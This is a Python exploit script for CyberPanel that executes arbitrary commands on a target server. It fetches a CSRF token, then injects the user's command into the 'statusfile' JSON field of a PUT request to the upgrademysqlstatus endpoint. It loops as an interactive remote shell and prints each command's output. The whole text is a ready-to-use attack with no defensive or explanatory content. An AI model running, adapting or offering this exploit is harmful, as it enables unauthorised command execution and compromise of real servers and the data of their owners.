CyberPanel upgrademysqlstatus Arbitrary Command Execution
import httpx
import sys
def get_CSRF_token(client):
resp = client.get(“/”)
return resp.cookies[‘csrftoken’]
def pwn(client, CSRF_token, cmd):
headers = {
“X-CSRFToken”: CSRF_token,
“Content-Type”:”application/json”,
“Referer”: str(client.base_url)
}
payload = ‘{“statusfile”:”/dev/null; %s; #”,”csrftoken”:”%s”}’ % (cmd, CSRF_token)
return client.put(“/dataBases/upgrademysqlstatus”, headers=headers, data=payload).json()[“requestStatus”]
def exploit(client, cmd):
CSRF_token = get_CSRF_token(client)
stdout = pwn(client, CSRF_token, cmd)
print(stdout)
if __name__ == “__main__”:
target = sys.argv[1]
client = httpx.Client(base_url=target, verify=False)
while True:
cmd = input(“$> “)
exploit(client, cmd)